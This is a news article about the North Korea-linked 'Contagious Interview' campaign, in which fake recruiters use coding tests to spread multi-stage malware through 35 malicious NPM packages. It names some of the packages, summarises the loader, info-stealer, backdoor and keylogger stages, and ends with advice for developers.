A new cyber campaign linked to North Korea is using fake developer job interviews to spread malware through 35 malicious NPM packages, cybersecurity researchers revealed this week.
Discovered by Socket Threat Research, the campaign, dubbed “Contagious Interview,” targets software engineers and developers seeking remote work. The attackers pose as recruiters on LinkedIn, sharing fake coding assignments embedded with dangerous code. Once executed, the packages deploy multi-stage malware that includes info-stealers, backdoors, and keyloggers.
Fake Interviews, Real Threats
The campaign follows a familiar Lazarus Group pattern. Threat actors send convincing Google Docs test projects, host the payloads on Bitbucket, and push victims to execute them during live screen-sharing sessions.
Algoritha: The Most Trusted Name in BFSI Investigations and DFIR Services
“These attackers pressure candidates to run code outside containerized environments while observing their actions,” said Socket researchers.
At least 24 fake developer accounts uploaded the 35 infected packages, which have already been downloaded over 4,000 times. As of today, six packages remain available on the NPM registry.
Dangerous NPM Packages
The malicious packages typosquat or mimic legitimate libraries, making them hard to detect. Some notable examples include:
- react-plaid-sdk, reactbootstraps
- vite-plugin-next-refresh, vite-loader-svg
- node-orm-mongoose, jsonpacks
- chalk-config, nextjs-insight
- *-logger, logbin-nodejs, framer-motion-ext
Multi-Stage Infection Chain
The infection begins when a victim installs a compromised package. This triggers HexEval Loader, which fingerprints the system and connects to the attacker’s C2 server. It then runs a second-stage payload using JavaScript’s eval() function.
The second stage, BeaverTail, is a cross-platform info-stealer that grabs browser data, cookies, and crypto wallet credentials. It also delivers the third stage, InvisibleFerret a persistent backdoor that gives attackers full remote access.
The final payload includes a keylogger that captures keystrokes in real time. Though observed in only one package, researchers believe it may be reserved for high-value targets.
Malware Capabilities Include:
- System fingerprinting
- Info-stealing (cookies, credentials, crypto wallets)
- Remote access and file theft
- Screen monitoring
- Keystroke logging
FCRF x CERT-In Roll Out National Cyber Crisis Management Course to Prepare India’s Digital Defenders
Persistent and Evolving Threat
Socket warns that the Contagious Interview campaign is still active. It follows a similar incident in March 2025, when North Korean hackers submitted another batch of malicious NPM packages linked to the Lazarus Group.
Developers seeking remote jobs are advised to treat unsolicited job offers with suspicion and avoid executing unknown code outside secure environments like containers or virtual machines.
About the author – Ayush Chaurasia is a postgraduate student passionate about cybersecurity, threat hunting, and global affairs. He explores the intersection of technology, psychology, national security, and geopolitics through insightful writing
